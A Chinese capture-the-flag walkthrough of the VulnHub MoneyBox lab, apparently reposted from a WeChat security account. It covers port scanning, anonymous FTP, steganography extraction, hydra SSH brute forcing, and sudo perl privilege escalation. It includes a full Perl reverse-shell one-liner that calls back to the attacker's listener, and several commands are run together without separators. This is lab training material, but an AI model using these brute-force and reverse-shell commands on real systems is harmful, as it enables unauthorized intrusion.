0X00 靶场下载地址

http://www.vulnhub.com/entry/moneybox-1,653/#download

0X01 靶场配置-单用户模式启动DHCP

启动靶场时，按e，添加rw signie init=/bin/bash

更改完CTRL+X 进入单用户模式，编辑vi /etc/network/interfaces

保存之后使用命令/etc/init.d/networking restart重启网卡配置,之后再查看ip发现已经OK

重启之后，开始做题。

0x02 靶机目标

3个Flag

0x03 打靶步骤

一. 网络扫描

1. 同网段IP地址扫描：

sudo arp-scan -I eth0 -l

发现靶机IP地址为192.168.1.105

2. 对目标靶机进行全端口扫描

sudo nmap -p- 192.168.1.105

发现目标靶机开放了TCP21、22、5000端口

3. 识别靶机端口开放服务

sudo nmap -p21,22,5000 -sV 192.168.1.105

4. 使用Nmap默认脚本测试，发现ftp可以匿名登录。

sudo nmap -p21,22,80 -sC 192.168.1.105

二、FTP信息收集

1. 匿名登录FTP服务器，用户名和密码均为Anonymous，并下载图片文件到本地

三、Web信息收集

1. 浏览器打开http://192.168.1.105，查看页面，并没发现有用信息

2. 对网站http://192.168.1.105进行目录扫描

sudo dirsearch -u http://192.168.1.105

发现一个blogs目录

3. 浏览器查看http://192.168.1.105/blogs目录

网页源码中发现一个隐藏S3cr3t-T3xt目录

4. 浏览器查看http://192.168.1.105/S3cr3t-T3xt目录

页面源码中发现了一个密钥3xtr4ctd4t4

四、隐写图片信息提取

1. 查看图片字符串信息

strings trytofind.jpg

发现头部信息有明显异常，怀疑有隐写信息

2. 查看、提取隐写信息

steghide info trytofind.jpgsteghide extract -sf trytofind.jpg

提取密码为：Web页面获取的密码3xtr4ctd4t4

3. 查看data.txt信息

   cat data.txt

根据data文件的内容可知，有个renu用户，且存在弱口令。

五、SSH密码爆破

1. 准备爆破字典

echo renu > user.txtcp /usr/share/wordlists/rockyou.txt.gz .gunzip rockyou.txt.gz

1. 工具爆破，推荐使用方法二，速度快

方法一：使用nmap自带脚本爆破

sudo nmap --script ssh-brute --script-args userdb=user.txt,passdb=rockyou.txt 192.168.1.105

方法二：使用hydra爆破

hydra -l renu -P rockyou.txt 192.168.1.105 ssh

得知renu密码为：987654321

3. 使用renu用户SSH登录靶机

ssh renu@192.168.1.105

六、获取Flag1-renu用户

cat user1.txt

七、renu用户信息收集

history

发现renu用户复制了lily用户的ssh私钥

八、获取Flag2-lily用户

方法一：

cat /home/lily/user2.txt

方法二：

ssh lily@127.0.0.1cat user2.txt

九、lily用户信息收集

idhistorysudo -l

发现lily用户有sudo perl执行权限

十、Perl反弹Shell

1. Kali主机nc监听5555端口

   nc -lnvp 5555

2. Perl反弹shell

sudo perl -e 'exec "/bin/bash";'

Kali主机接收到反弹shell，且为root权限

sudo perl -e 'use Socket;$i="192.168.1.103";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

十一、获取Flag3-root用户

cd /rootls -alcat .root.txt

sudo arp-scan -I eth0 -l       sudo nmap -p- 192.168.1.104sudo nmap -p21,22,80 -sV 192.168.1.104sudo nmap -p21 -sC 192.168.1.104sudo nmap -p22 -sC 192.168.1.104sudo nmap -p80 -sC 192.168.1.104
dirsearch -u http://192.168.1.104
cp /usr/share/wordlists/rockyou.txt.gz .gunzip rockyou.txt.gz
echo root > user.txt
nmap --script ssh-brute --script-args userdb=user.txt,passdb=rockyou.txt 192.168.1.104
strings trytofind.jpgstrings trytofind.jpg | more
steghide info trytofind.jpgsteghide extract -sf trytofind.jpg
hydra -l renu -P rockyou.txt 192.168.1.104 ssh
sudo perl -e 'exec "/bin/sh";'
nc -lnvp 5555
sudo perl -e 'use Socket;$i="192.168.1.102";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python3 -c import pty;pty.spawn("bash")

0x04 参考链接

https://blog.csdn.net/Amherstieae/article/details/106155826

本文版权归作者和微信公众号平台共有，重在学习交流，不以任何盈利为目的，欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用，大部分文章来自各大安全社区，个人博客，如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览！！！

敲敲小黑板：《刑法》第二百八十五条　【非法侵入计算机信息系统罪；非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。

原文始发于微信公众号（巢安实验室）：MONEYBOX